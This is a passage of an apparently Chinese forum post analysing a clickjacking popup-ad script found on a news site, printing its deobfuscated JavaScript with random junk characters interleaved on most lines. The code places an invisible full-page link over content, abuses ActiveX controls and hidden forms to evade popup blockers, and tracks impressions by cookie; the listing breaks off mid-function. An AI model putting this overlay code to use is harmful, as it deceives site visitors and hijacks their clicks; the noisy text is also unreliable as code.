天星网ClickJacking点击劫持分析( c( G3 O# g. y2 `6 G4 m8 P( f: `
http://www.21tx.com/ 天星网
" I6 h3 g3 d* m# r X1 l" I/ o4 H/ D! `/ Q我得联系联系作者 ' W1 j+ J! o/ D! T4 u
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。8 ^5 H$ ~: Y5 m* K4 n
http://www.lxting.com/script/popup/v1_min.js
9 [" R& i2 s4 v# X1 C, h( M9 \ y" a/ K
这个是锁定到底JS脚本,
9 Y2 Q6 t }/ z' m解密后的代码- (function() { ; q2 A, L+ U, Q4 T1 }+ i) Y
- var aa_url = window.ytpp_url; ! ~& @1 p8 f, I2 S1 O
- var ua = navigator.userAgent;
8 Z$ l8 y L: G4 H! r8 N, q - var form_div = document.createElement('div');
$ W2 _7 {' ]. P$ [/ d - var form_pd = 0;
3 I+ F( m# P9 u6 S" g - var browser = {
! _/ V9 v- Y* N4 |" m - ie: /msie/i.test(ua),
9 C( ]/ C/ d: G r; F% ~ - ie6: /msie 6/i.test(ua), / I+ s2 g# Z. V e8 H6 h
- ie7: /msie 7/i.test(ua),
1 ?! A( w" r0 U' T - ie8: /msie 8/i.test(ua),
+ [; W% u. h) q' q - ie9: /msie 9/i.test(ua),
' x% Y8 R. [% l - 360 : /360se/i.test(ua), 0 H' V/ l, _) d# F' r6 @
- sogou: /;?se.+?MetaSr/i.test(ua), - M! u4 S# S$ I5 F* O
- maxthon: /Maxthon/i.test(ua), : d" ^$ K. O5 i
- tt: /TencentTraveler/i.test(ua), / b' F+ l* k% t" [
- ff: /firefox/i.test(ua), # r; [% Y1 ]3 x2 P% W* G1 Z
- webkit: /AppleWebKit/i.test(ua),
, K+ s6 C' R" \ - opera: /Opera/i.test(ua), ) M& c# I6 S; m( Z6 A" R
- qqbrowser: /QQBrowser/i.test(ua),
# ~4 Z, I$ o& a0 r$ |3 {! ^" e - cr: /chrome/i.test(ua),
/ c+ d- U9 g3 W) g: m8 S, m; s - gg: window.chrome, 7 U7 [8 s) ?: X1 R( E) X
- theworld: /Theworld/i.test(ua) , s0 l8 v+ U4 p5 D
- };
: u, H& R Y9 T9 w - var _setting = ""; ; v. _* ?5 y' u. S" ? r0 o
- var _ct = 0;
9 `" b# p8 Z' t1 ~+ Q% R6 f. h/ B - var _le = 0; 6 ~& f1 Y4 v6 b: |3 X2 n/ T( o
- var _pd = 1; ( Y8 q1 Y2 k- T: r) z" Z
- var _pd2 = 0; 6 Q5 p1 L) O) @* s6 C# g
- var _pc = 1;
5 ]9 \3 Y. O# X: i I* P - var _pc2 = 1; h) n- I+ y) p2 K) O' D h
- var _pco = 0;
! Y2 y2 @% a1 V4 p - var _pta = 0; 4 _9 @% t: `5 \0 |* w+ V1 Z
- var _ptb = 0; $ W x( \+ |8 w8 U& g
- var _pt2a = 0;
9 }9 V5 q p+ C; B: ^+ y* t0 X - var _pt2b = 0; 6 n" N, B9 s4 ?0 w6 n
- var _pt3a = 0; ) t9 d6 v! ?9 C
- var _pt3b = 0; 5 N3 I/ F* k. W- m9 d; ~; O
- var _pt4a = 0;
) Q$ b7 N4 `/ ~ b, y$ ^ - var _pt4b = 0;
1 {+ G& b! z$ p4 W* {+ A6 L% S - var _pt5a = 0;
7 `9 k' `4 x& U- ~. X - var _pt5b = 0;
) f7 D S5 S& j - var _pt6a = 0;
$ }' b; u1 v( `2 r: G4 o - var _pt6b = 0;
7 A5 a. |) k/ W. v! ]4 p5 T: u - var _pt7a = 0; 8 z; w$ ?, |8 B0 M. n
- var _pt7b = 0; 7 x/ ]" @( J- x# T2 }
- var _pt8a = 0;
& G0 y9 }/ m! @) B9 o5 n% k Y- T - var _pt8b = 0; 3 A8 O, A* ?9 ^, w
- var _pt9a = 0; 0 }, ]' J% n6 q
- var _pt9b = 0;
0 Q/ o. A8 \' @+ q. L - var _pt10a = 0; " b9 M' l9 {9 N" F
- var _pt10b = 0;
- y- v8 c4 U" w" ~! K; o - var _po = 0; 9 J! ] M, J* F
- var _poo = 0; * ]6 |6 k/ K# X: H+ o
- var ckn, ckt; ; o/ }' K; Y0 h/ e+ C+ t- I
- var ads = 0; ) s& i1 b: T1 j, } G: k$ J
- function b(w) {
4 u0 L% z# t3 [! ?9 a# u1 E0 K8 B - var s = w + "=";
- l) b* J. L3 A) |) u' q+ P - var r = "";
1 X, N! r/ E/ W6 G9 k - var o = 0;
( n( M& Q4 @2 S" w - var d = 0; 2 m7 h3 a5 P2 r
- var p = document.cookie; ) Y; R5 \- n' I6 z8 }$ s# E4 ~
- if (document.cookie.length > 0) { - I. L4 B! {6 ?9 l* ^* a6 p% ]
- o = document.cookie.indexOf(s);
* K( [# O V/ Q6 D# ?7 P) m - if (o != -1) { 4 ^7 a* n: p* \
- o += s.length;
7 n* p7 k) _$ J6 X' B- d/ f4 T# R - d = document.cookie.indexOf(";", o);
+ D, j9 E6 D2 H# r% z - if (d == -1) d = document.cookie.length; % F0 D+ ?, ?7 z% ^
- r = unescape(document.cookie.substring(o, d)) 2 B4 [4 O. z5 B( @
- }
8 U8 B/ \9 a& P# S( v& e - } ' t$ d/ Y! [8 G4 e
- return r : w) a* L% Z( g( i2 s# }( v: ]/ R
- }; 2 k' ~$ D3 _6 d
- function p(w, p, v) { 0 U2 N" H$ F5 e, N4 m4 ]
- var t = 30; P. e& m# H5 I' Y+ O; T: z1 X
- try {
, d) c7 x R6 ~( s' T - t = parseFloat(p) * 1
$ |1 C/ @2 X% ]' q$ b - } catch(e) { ' C/ |$ h1 W* x" s/ l7 S
- t = 30
% h$ K2 q2 z+ j- d2 n# _ - } 3 p! [5 [+ v" n7 q- V
- if (isNaN(t)) t = 30; 9 {& i$ f' S9 ~7 Z- E/ y1 [6 A
- var then = new Date();
1 o* u: v9 s& ^: d) e - then.setTime(then.getTime() + t * 60 * 1000); 3 o, }8 _$ ?, F6 E0 K1 p u. P
- document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
5 O B* c3 D1 v - }; " \( f9 a% _3 A# e% U# e
- function init() {
! r7 X0 e2 {, B7 w! U3 k - _setting = ytpp_sti;
1 ^* p% g9 O/ \$ J - if (getp(_setting, "CT")) { 6 `; p( c2 {) H% g% M( c
- _ct = getp(_setting, "CT")
. C. l/ p5 ] u7 w8 `' Z - } # B/ a* h0 y. [" H( U
- if (getp(_setting, "LE")) {
% F% s' t) h2 Q" M - _le = getp(_setting, "LE") 6 i# P6 F" R3 c% `/ x
- }
+ z# R( l5 f, Y3 V - if (getp(_setting, "PD2")) { , J+ _1 Z* ^! B# |/ T7 e" k
- _pd2 = getp(_setting, "PD2") " |1 C/ |: X8 G: l/ y) r) n1 r/ m
- } ! I. N/ s5 U6 G- z+ m2 y
- if (getp(_setting, "PC2")) { M* S# Y9 |: m) d) S
- _pc2 = getp(_setting, "PC2") ; c/ @; |& ?0 N- u3 w
- }
% {1 N+ I1 R4 r' n - if (getp(_setting, "PCO")) {
" c0 T) L* F# v! D# q" j& u - _pco = getp(_setting, "PCO")
" _) |" D! w7 s. Z8 y O$ [7 U8 I - }
( b. M. B6 ]/ T V! w( w - for (var i = 1; i <= 10; i++) { 8 g" L8 c- s- e) m4 Q: Q
- var n = i == 1 ? "": i;
k! a1 \1 {9 l6 e6 Q - if (getp(_setting, "PT" + n)) {
& R' c& ~0 y5 S, @$ J0 Q - eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
# _! B0 C1 k+ o0 g" I7 u - eval("_pt" + n + "a = _pt" + n + "[0];");
$ c- j, g9 y& a& u7 c5 p: b' V5 ? - eval("_pt" + n + "b = _pt" + n + "[1];") 0 N: ^- I: y- F5 C- @) @7 J
- } * U% u, g$ \& |3 o
- }
! [6 }, ~, x5 i2 ^; K - if (getp(_setting, "PO")) {
: X# Y8 V! Z3 G; Q; ? - _po = getp(_setting, "PO")
( h3 f( u( _- v1 P1 D& F. M: D - } % g) C) m1 C6 j: J; r8 @
- if (getp(_setting, "POO")) {
& b" o5 C9 B1 F# j0 D/ a' y - _poo = getp(_setting, "POO") ( T1 o& v8 w5 k
- } 1 D- ? }4 b# }9 }. r* I* I& Y0 z
- if (_pco == 1 || _poo == 1) { 1 C. ~1 c I% ?! N; Q5 `- L+ b p
- if (_poo == 1) {
4 P' U2 u: a5 Y" f1 D0 q - _pco = 0 6 d$ h0 a$ H1 ^" a- A
- } else {
* V( b) K0 A4 M$ i0 c- \ - _poo = 0
( s f# t0 l( ]( `3 R+ Y - } ) X4 | t) _% M" C1 s8 Z
- _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; 4 `3 V; o0 D' u, k2 x& R' P) }
- for (var i = 2; i <= 10; i++) { 8 a5 H% x" q5 _2 o( C; V) b
- eval("_pt" + i + "a = _pt" + i + "b = 0;") . j, o3 I/ w7 i5 s# m& w5 g5 x
- }
$ _# m4 s; A) D" s' n0 J - }
& `0 Q: i' v' ~& f8 [ - }; 8 j* ?! Q) O8 S" o; X8 g" \
- function getp(s, p) { $ \5 t5 K8 N/ k) h
- var i = s.indexOf(p + ":");
8 A: g3 \$ M2 i) h& T9 D - if (i >= 0) { ) R ]2 @) ?6 |. P
- return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) $ ^/ z% h6 s8 ~8 k- J+ X
- }
$ w/ g5 C+ R: n$ k, @/ k- b" c* C - };
. ?& G4 {" B9 L+ X* w) r - function event(e, event, func, act) {
! `( L+ K0 n& N# d" N4 h5 Q - if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
. g8 X, p% o8 k7 K* u - else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
: ]+ `6 ~' Y1 t1 A' `/ X! i5 z - } ) J7 Q/ ] U* [' }% o
- function pop(url, param) {
" d4 Z) Y: Z2 \ U* V2 e0 k - if (!document.body) { 9 Y1 i% s7 W8 P3 y9 O
- return setTimeout(function() {
A- y& H6 M! i/ L. U0 \* p5 Y8 H - pop(url, param) 7 N0 a6 L+ A2 H$ ?0 v: d0 e; Q, _
- }, 5 w( ~" V/ k& [, j$ U& B
- 13) / [: o2 [8 _8 A6 X k
- } * }+ E$ D& n- u/ [" P
- try { 3 p( o$ Z( ~! F4 f& ]/ i9 i/ q
- if (browser['cr'] && browser['gg']) { 8 m4 M% ~9 {5 |# Y+ ]
- try {
1 l( B8 K) P# Q - hrefopen(url)
: p, B/ ^4 T8 U, K - } catch(e) {
' o# O1 P: j9 w @! } - a_pop(url) . Y( @* u* w% x- k9 z5 S" b
- }
& S& x, d! i H( B" M; V. P" b - } else if (browser['webkit'] && browser['maxthon']) { ! h* `7 b( H; n" {: M0 u
- if (!func(url)) {
. u! @3 D' B6 o j9 ?) Q, b9 C z( K - try { * H. O- Q5 K0 \6 F; _4 n
- form_pop(url);
* R [8 Z& K* J2 X: y. q% j; U/ J - a_pop(url)
! `2 @; Z+ c9 B* C( Q - } catch(e) {} + {' f1 Q' p+ N
- } 2 [. M8 V$ L# _2 k3 @
- } else if (browser['tt']) {
7 @) K2 ^, P5 L& l - try { 1 K& n- _" r9 |, I9 S! y; B0 U
- object_pop(url) 7 m4 b" A+ G/ j- v- W
- } catch(e) {
4 V' p8 U1 k/ v* k; O - a_pop(url)
/ O3 ]1 l& K/ k# W! n) I' N$ a - }
8 i- a" {) |: X/ B- K( R, X - } else if (browser['sogou']) {
9 n7 I- _2 |. P+ a9 { - if (!func(url)) { & Z8 |8 X! d2 ?$ z: R
- try {
. G1 g+ Q6 W! ?, R - a_pop(url)
' D5 v7 i4 }& V |4 ] - } catch(e) {} $ F) T$ f4 X& I* l
- }
- S/ r$ U' o4 e, V3 P! K - } else if (browser['webkit'] && browser['qqbrowser']) {
' k w! K1 t6 o- ` - if (!func(url)) {
s1 N1 h5 h# b. g6 y6 U) A - try {
/ ?9 J* j$ i0 a# K - form_pop(url) " [# b7 [9 n2 p. P& @% p+ F$ _
- } catch(e) {
$ X" E5 t8 I' @8 f: Y( T - click_pop(url) & B" s# @1 h7 _ m
- }
+ @2 {8 q+ c- a" Y7 `9 W - } 5 O" o1 c" W* `8 F
- } else if (browser['webkit'] || browser['opera']) {
# Q+ }8 B( D+ \, y. @! |1 g- ] - try { 9 J1 b4 x( t K0 R
- form_pop(url); 6 g- }* Q v, ]% V% M5 }
- a_pop(url) 2 e5 M! A; u' g* l+ X9 F8 |9 F4 W2 R
- } catch(e) {}
) \- u' U* s6 c, m4 E$ E - } else if (browser['theworld'] && browser.ie6) {
% X) {9 ?6 C |1 U6 t - if (!object_pop2(url)) {
6 U! R( N7 Y: g) K7 G - a_pop(url) ' A9 i) \( j( w2 K6 h0 V
- }
* E- ^9 k( S1 J w ? - } else if (browser['theworld'] && browser.ie8) {
; _% v) n3 E* {; ? o - if (!func(url)) { ! P2 a( ?; W2 M) _& m2 r
- try {
; b3 h. ]4 H9 P) M' }9 |/ O% G - object_pop(url)
3 T2 G: b: V' Z! f - } catch(e) { 0 j. M( o) m. h9 k6 \0 H# [7 K
- click_pop(url) 1 g7 j: J2 i4 S7 j, ]1 \$ j/ |; Z8 M/ Q* Q
- }
' D5 ]! v- _0 d. s - }
* p1 F4 F0 B5 X- W2 I - } else if (browser.ie6) { / l, @% `9 }0 Q# B! |7 {
- if (!func(url)) { 8 Q8 e2 v! v5 k; L
- object_pop2(url)
: b: {+ s$ c& Y/ v, b' x4 o - }
1 Z1 C, V- v4 g; D0 U; y - } else if (browser.ie8) { 2 j. s; S3 Q# e7 b! E/ @$ b
- if (!func(url)) { 7 @2 C2 K" F4 c* F6 u
- try {
2 h4 I/ J# W- z - object_pop(url) # F) R8 e! W: h1 J
- } catch(e) { * K% U/ h8 M( M4 F* {! V+ k, i
- document.onclick = function() {
8 k" D m9 u' J; p \9 e% U - func(url); - g7 s4 P( f `9 k
- document.onclick = null
3 ?) B' P- g$ s" C4 u - } 7 P. I) e. T% J N
- }
; N/ u( S5 e) }7 n7 z - } - I# `: O0 a' w: x* D/ v S4 h
- } else if (browser['ie']) { + n7 G5 f) }2 s3 e |/ L4 u
- try {
6 @1 d2 e% ?& N2 u1 q, Y - object_pop(url)
9 ~$ c$ E+ x. E0 ^- [1 d& ^& K: o - } catch(e) {
3 p! Y# F; b$ T: o - click_pop(url)
* c. m( V b: i/ B+ `9 Q - } 4 l, `7 X/ X3 a( s! j/ H
- } else if (browser['ff']) { ( l' k# B* b5 E. Q! e, Y
- if (!func(url)) {
9 Z" h: |+ f3 q; y) ]. a - click_pop(url) 5 B$ v. r- f/ j* ^/ p1 i
- }
2 d' i6 V% `1 ]* q - } else { v2 k! Y# ?7 }$ ^3 }6 h9 D
- if (!func(url)) { + R) U+ k; E. e7 |7 e% M
- click_pop(url) 5 ]) o1 X2 o' \5 J
- } " l q& ]: Q! @: u
- }
8 Z1 w7 v( d7 d5 e; G - } catch(e) { ! f3 l, J+ u; y
- if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { - t: [8 j1 N& T1 z4 q: M* ~
- click_pop(url)
5 V$ A7 ^7 ]/ v5 o' c - } else { / d3 o5 i9 E3 b" ]* Y- q
- a_pop(url) 1 r; F5 P H6 \: S! X+ E
- } 3 ^9 r1 H( T O9 } h; r4 Q; I
- }
. B2 O" N) g! D* D- ~8 } - }
. u: T; U6 l. ~0 d& I; x - function object_pop(url, param) { . I+ H/ x+ o6 L* q" K" q/ n
- var object = document.createElement('object');
& [ N& Z' {' y5 N% J+ s - object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
) g0 K4 R6 |) k! k; U& d, a - object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 7 P* {& P& u' x% G; L/ e
- append(object);
% F f4 ~% C0 V' X7 T ` - object.launchURL(url);
) b6 L4 N% \6 y4 C( F - ads++;
6 \4 b6 [; u) ]1 x6 K. z+ V - p(ckn, ckt, ads)
! C/ H2 O* {1 b - }
3 n' a1 ]8 J( ^( D - function object_pop2(url, param) {
! v9 t7 j1 v* ` - var object2 = document.createElement('object');
( G' Y3 k' ]$ q1 E6 e; w+ ~1 G: A - object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A');
9 b4 n0 Z8 h% S& D* x, L Z% N _ - object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 9 J. `8 S l" ^ D
- append(object2);
* \; N- z! D' [0 O5 ` - for (var i in object2) { % T1 U4 z7 k0 l4 f$ X
- try { (function(o) {})(object2[i]) ]( N7 ]7 P! \* }
- } catch(e) {} ( f$ d$ T& I) I0 t2 i, M( O
- }
/ Z! I% }- ~6 X8 w! p7 @2 r - setTimeout(function() {
( v( s2 Z: Z: F - object2.DOM.Script.open(url, '_blank', '') ; t. P' a' p, A- P5 @/ B2 `
- },
* N5 b; b6 }7 T0 t - 500); 4 ~) j/ V" o+ d$ l* w s8 B9 f
- ads++;
6 r- d8 T; Y1 }' k# b - p(ckn, ckt, ads) 3 d+ `$ ?1 U+ |- t7 }
- } / q u4 Y# y5 j0 J
- function append(e) { o4 y7 U$ b% A% G9 L" ^
- for (var t in {
7 H# s0 P" w8 H1 \$ K, E+ @: c - body: 1 , N5 q) P ?3 y9 a5 y
- }) {
0 \. m' f8 D; s* x( U$ M - var ele = document.getElementsByTagName(t); 2 U- m5 ~8 o6 g6 A, G; n
- for (var i = 0; i < ele.length; i++) { ' Q% z2 n6 E6 [+ E% t
- ele[i].insertBefore(e, ele[i].firstChild);
1 @/ {, Y7 s3 S0 c" w1 |' w+ ` - return0 F: z o! D3 d' R; W& [
- }
5 f% F2 r8 z6 C7 n) J - }
. [/ x+ l" H9 h% u4 _9 u% s3 A - } 4 S! j1 |0 ~' x4 k/ Y1 w
- function hrefopen(url) { ' ?, \ e2 G6 |1 J
- try { 4 m/ k1 L# W2 Y! g5 s& T
- var c = document.createElement("a"); $ h# N2 A# m5 ~0 w
- c.setAttribute("href", url);
( B' ]! ~- J7 r4 \8 a% C - c.setAttribute("target", "_blank");
6 G3 X0 ^* ^; `* k5 v - c.setAttribute("style", "display:none;");
2 C8 X! `" H! o: k: A - var b = document.createEvent("MouseEvents"); % g/ y( c' H* R! c) P' k
- b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null); / w% o( V+ O0 p, L. _3 x4 h
- c.dispatchEvent(b);
" ?7 y! Q/ c6 k0 r - ads++; $ b5 Y( Q! W" i; s
- p(ckn, ckt, ads); ! V1 ~" ^* W: r8 b8 ]2 s
- return true! f7 X3 r. B' }! |+ q
- } catch(q) { 1 s+ ?/ s9 J5 b; v+ q# U) h
- return false4 H4 Z$ E5 L7 _: T, a
- } . n# B7 i0 o# f2 k4 b; V5 y6 k7 I
- } + h- R2 @3 M7 A, ^+ t
- function form_pop(url) { ) m" v) c: R/ C, F+ z
- form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 1 p0 f2 i1 M/ E5 `1 q2 d
- form_div.setAttribute('style', 'display:none'); ( f% r% P! M7 ^7 P6 v: A! w
- var form = document.createElement('form');
! i' U/ a" J0 l% t/ g - form.setAttribute('action', aa_url);
" k& F; k4 } [/ w' ] - form.setAttribute('method', 'post'); / y, q5 N8 g3 i- N4 }$ u
- form.setAttribute('name', '__unionsky_push_d_form_box__');
/ x9 g' f( g9 C. G9 M8 ] - form.setAttribute('target', '_blank'); + z z$ [0 e% [4 ^1 `
- form.setAttribute('style', 'display:none'); 1 U, y/ R: `, R5 c' i6 Q( A
- var sinput = document.createElement('input');
) R. P% Y( J6 x# u! h - sinput.setAttribute('style', 'display:none'); , H1 a& v& S7 X+ F( Y: ]- ^5 n: w
- sinput.setAttribute('type', 'submit'); 4 j+ N; @+ t3 s8 v9 p6 O" n5 V
- sinput.setAttribute('id', '_sumit_2app');
: N. R8 V: k6 K# i- o2 |, V2 o - form.appendChild(sinput);
2 D/ F% A! U, x - form_div.appendChild(form); 8 C* R0 r6 b, d# M$ c( o
- append(form_div);
6 i P, {/ k; i T7 g - var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
. p0 c! L% [+ k, k7 D; \, |/ H - try {
2 _8 T1 R6 Q9 Q - document.getElementById("_sumit_2app").click() 4 L- q) ~ k) N/ I# K
- } catch(e) { $ L$ g# w- ^% C# G
- event(document, 'keyup',
5 J9 q) B' O2 d: _ - function(e) {
' v& J( q2 k; @4 | - if (document.getElementById('__unionsky_push_d_object_box__') == null) { 7 T, m n; k! M' w
- return T% d: w( k O0 A3 v. @' M+ l3 b
- }; ) A) _; r( d7 d5 L( U- Q
- e = e || window.event;
$ }+ e* R! E) A. c/ n - e.canceBubble = true;
4 Z" B1 N2 g: ^8 v9 N& D( S - event(document, 'keyup', arguments.callee, true);
* D7 W' X' t& n9 B X0 R" v - form_pd = 1; 8 |$ D1 m' R/ a) e: h' ~
- unionsky_from.submit() 0 f- g' s- L! \3 }1 O3 ]
- })
9 U: d4 }( N8 ?+ a1 s9 ? - } 5 w& `) a' r# D3 R% b& I
- };
5 t) ~ r) d# ~: c1 m - function click_pop(url, param) {
& j7 ~" P7 m, O* H! Q4 U! c# C; R1 e - event(document, 'mouseup', - X# F- ^5 E9 v3 i
- function(e) { 7 X$ }. s3 y" ^* J
- e = e || window.event; & ~2 ~$ B1 ]5 F% B
- e.canceBubble = true; 1 J2 C# p; d! T* W5 E
- event(document, 'mouseup', arguments.callee, true);
; r T& W7 w2 O* v; N - func(url, param); ! D; l7 X2 B6 D4 f1 u m
- ads++; $ P& \" R' w! b0 O
- p(ckn, ckt, ads)
; h8 u3 V" V. @$ j! o* u; K - }) ' P( H- V4 h% f. V2 M3 d
- };
( E: K% m5 X/ q% b; n0 F. w - function a_pop(url) {
7 I2 V( }9 L4 X - if (ytpp_plid == 166028) { 3 W7 G" Z; U( v" C: n( O- S- a
- return; R7 D! f" V5 @9 P+ S- R7 z/ G( b
- }
) V5 Y4 S; ?+ B2 ? A6 y j - if (!document.body) { 8 d' r" N ~) s
- return setTimeout(function() { & W8 S9 \9 K5 y7 k E
- a_pop(url)
! J& o, |/ U! g0 D - },
. V7 R: j y) a - 13)
. F/ m2 }# f; P - }
/ e: V2 G) F7 `# g7 | - var a = document.createElement("a"); # q* Y: l& E5 G! W
- a.href = url; 5 e M- M( F5 R1 ^% [$ W: Y) b
- a.target = "_blank";
$ J0 m8 J" M: h# k - var div = document.createElement('div');
8 i) l9 h# r5 |6 `# { - div.style.backgroundColor = '#fff'; - W) ^* @) T) }0 Z6 m
- a.appendChild(div);
) [- x. A* l; b# [. q8 g4 W2 B. Z: V - append(a); - q5 @+ o: ~& I+ \/ c1 w$ q
- var as = a.style; 4 P/ f1 o1 H( |
- as.position = "absolute"; * a7 `4 @" l @
- as.zIndex = '2147483647'; 7 ]: @0 g H2 P* M
- as.display = "block"; 5 L$ a x% F: {5 g' O* Z0 }( a
- as.top = "0px";
) E: P% j/ X) H( m2 m+ n - as.left = "0px"; 1 M" x5 _; F0 R4 h; w
- as.cursor = 'default'; ) k4 H ]- C) e1 f' Y
- as.opacity = "0";
% O& `2 d0 W! @) ~8 m# G - as.filter = "alpha(opacity:0)";
$ T4 |, P/ d. j& Y+ t9 w - var m = setInterval(function() {
2 N, Z% E, j. g" N) G3 a! y - if (form_pd == 1) {
2 b/ ^9 K% [+ H4 }6 B7 r1 H - a.parentNode.removeChild(a); % e& N0 S# X. e4 N
- clearInterval(m); ! _: l6 \6 X6 V8 D' @# O
- return3 k! E( q' k+ @2 U0 n1 H# W
- } 1 G2 J! I' h8 s$ Z7 R$ f
- a.style.zIndex = '2147483647';
`& ?7 h5 w6 W - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; g# Q) P/ s' `* _
- a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
! W5 L+ s& h* \+ K - div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
+ j; W0 m& S. B9 u( X. F - div.style.height = d.clientHeight + 'px';
+ E4 r4 F( P0 U# ?; Q - if (browser['ie']) { ' `6 S& P. \2 a2 F5 W% x
- try { ' \, z% x W0 J& V% R, {/ W
- var divs = document.body.childNodes;
3 |* s- Q: z( G; f8 i$ n: T" t5 Y - for (var i = 0; i < divs.length; i++) { 0 g) y% Y0 {* U* w
- if (!divs[i]['style']) {
) c: Z# q0 K* K; H& }$ q - continue
& X' q5 [, c$ h5 } - }
0 n+ p: R2 e' L - var _i = parseInt(divs[i].style.zIndex);
X. n6 E7 T2 o- w - if (_i && divs[i] != a && _i == 2147483647) {
+ y0 a. @3 A3 t" j - divs[i].style.zIndex = _i - 1
4 e+ _4 N' E% I0 q( j' k$ F - } # P1 A7 X; ~* f, }2 F e* K4 e
- }
- ]( k" m' @- }% ~% C, l - a.style.zIndex = '2147483647'" l% ?. a0 w7 |: b( @* a5 v, T9 c* h! N
- } catch(e) {} * F& Q g: P z5 v
- }
! T9 m- L/ d. a2 r - },
! b2 j' }7 C% \5 F0 g - 120);
0 b' K) X0 h. r% Z" m - a.onclick = function(e) { 8 N, L" Y, |% r- r z
- if (document.getElementById('__unionsky_push_d_object_box__') != null) { : Z3 D w2 [' U0 h# k! Z3 ^# _% X
- form_div.parentNode.removeChild(form_div)
+ w4 ~1 d/ U( S" \. l) N - } 7 \+ \! R% q+ d: k* r
- e = e || window.event;
; T! y, U2 j3 a" u - e.cancelBubble = true; % W$ r! q9 T' X! b
- setTimeout(function() {
% y" c: C4 H1 n+ |6 b - a.parentNode.removeChild(a)
: i0 ^0 n$ X- T9 n9 ?3 d - },
3 O3 m8 W( c. y4 n) {3 q' E - 200); 9 F: [( f% ^" f" h& V M' y
- clearInterval(m);
, ^4 t, @9 N) v) k3 T - ads++;
+ ~$ k W! J% }6 e - p(ckn, ckt, ads)
" K1 E% K) x4 _4 _; q$ B8 ~% f - }; # T! h% J. K% j8 x' v K- c
- event(a, 'mouseup',
4 C% x" d g% ~ - function(e) {
, I7 k) W# o! q( k - e = e || window.event; 3 n2 |3 O: J1 r, }1 ~+ Y
- e.cancelBubble = true9 z4 `, Z" o2 q& ] n {5 H9 E
- }) # y( {$ } X; s' _" ]! p
- } 6 K/ X4 q/ I* O
- function func(url, param) {
N* ^( f. S3 H U - var f = window[String.fromCharCode(111, 112, 101, 110)];
8 s5 T/ C5 D& T, [ - var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); 1 P- N- D v5 a) ?% K
- if (w) {
' H# P0 I3 D! Q# m8 Y; @ - ads++;
! `* V% e% w* [5 R& I/ O, O# j - p(ckn, ckt, ads)
' q0 S" \( m5 _/ N; X. \ U* j* v B8 b - }; ! n' @. q4 v8 K, W, f% Q/ }
- return w 2 p! x* D$ u7 H# B% P9 a1 r- p9 C
- } ) z+ `* R% z7 d# l5 w* O' @! {
- function fstart(url) {
% n- h# _; B- v8 G1 a4 \7 u' O - init();
) z$ `: z- m7 f8 E7 I - if (_ct >= 0) { u5 ^( c! @& I3 j2 H4 Q2 r
- ckn = "YITIAN_NUM";
1 ]8 Z {. G* P2 b6 a - ckt = _ct 6 i! }: P- @' g) {" g2 l) b$ x
- } else { 7 V( |5 S( D8 T& h2 H" s. I& R) C7 O
- ckn = "YITIAN_ALL"; 2 r" o h* v e2 D
- ckt = Math.abs(_ct) $ z- }3 B$ J7 S6 b4 d
- } # T% X1 ?0 n3 \! g# `2 b
- if (ckt > 0) { / H$ F: B1 P6 @3 Y" M) S* N
- if (b(ckn)) {
( W% R6 Q# F- R - try {
' l; A0 ?' }* v5 c - ads = parseFloat(b(ckn)) 3 q% ^$ U9 {% V2 o) `) Q n' y
- } catch(q) {}
' p2 `0 J- k+ A* Z. b, Y+ g - } 8 x+ x9 x6 u4 t9 Q R
- } 3 k# s$ l' z# V" [1 q H
- if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 8 \. S$ ?# R0 y/ |
- return& A. z& F& K, g4 p+ \& \
- } else {
8 ~* n1 `1 G( Z) L6 d' M - if (_le > 0) {
# ], t" D D/ S3 ], M% A3 T' f/ I7 J - setTimeout(go(url), _le * 1000) ) b. m% o U3 _# k& q
- } else { 8 Q. x& z: y& l
- go(url)
9 F8 u( b, A# ?- ?, B - } 4 n: X2 w5 F! Q; r
- }
& R) ?. w. u, d8 H0 F1 S$ s) k - }
. Z4 }; t5 ^9 n* Y% L& U( P) _ - function go(url) { : m9 I3 `+ j0 _1 E' [
- if (_poo == 1) {
. w* L8 O* Y/ G - try { * X) F( D: _; ]: Q
- func(url) ( L: r/ `! n# n- `
- } catch(q) {} 8 Z% n) ^9 O# l- w+ V6 f, G
- } else if (_pco == 1) {
+ x+ k+ }1 ~: I+ q k# L! q - a_pop(url)
1 H. I/ E b1 u2 K/ J - } else { & M8 a3 R" n7 g' G* b$ }3 @- ~
- if (_pd == 1) { / R% F2 \: u1 a$ P. z! P
- setTimeout(function() {
! X8 B4 f( X+ B- T: R1 d - pop(url, { ' }; o6 i% s; k. I- @2 w- Z5 E3 O' ?1 N
- a: 1, ( g2 P: H8 O8 w P7 E7 ~8 @' q
- b: 2
: D3 t0 _) ], t5 ^" G! f' g - }) # P e- C0 f+ F
- }, ( ?7 F7 U0 J# b0 d1 i& n! ^$ i
- 300) 2 P. ~4 z$ p# Q3 @+ ~* a1 g6 m+ b6 X ]
- }
* ?+ C& s4 S6 X( `7 w - if (_pd2 > Math.random()) { / [' M! v0 o- O+ X' x
- setTimeout(function() { & w. d1 O9 F( p2 ?+ h8 {
- pop(url, {
( E6 b6 n: K5 T7 d. V# [0 |1 l - a: 1,
